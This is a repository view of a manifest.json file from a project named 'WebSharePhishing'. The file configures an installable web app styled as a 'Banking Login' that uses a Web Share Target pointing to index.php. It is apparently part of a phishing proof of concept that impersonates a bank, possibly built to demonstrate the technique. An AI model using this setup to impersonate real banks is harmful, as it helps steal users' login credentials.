Newer
Older
WebSharePhishing / manifest.json
root on 26 May 2022 553 bytes initial commit
{
  "short_name": "Bank",
  "name": "Banking Login",
  "share_target": {
    "action": "index.php",
    "method":"GET"
  },
  "description": "Log in to bank",
  "icons": [
    {
      "src": "https://rossmarks.uk/bank/bank-192.png",
      "sizes": "192x192",
      "type": "image/png"
    },
    {
      "src": "https://rossmarks.uk/bank/bank-512.png",
      "sizes": "512x512",
      "type": "image/png"
    }
  ],
  "start_url": "index.php",
  "background_color": "#c6f2f7",
  "display": "standalone",
  "scope": "/bank/",
  "theme_color": "#14168c"
}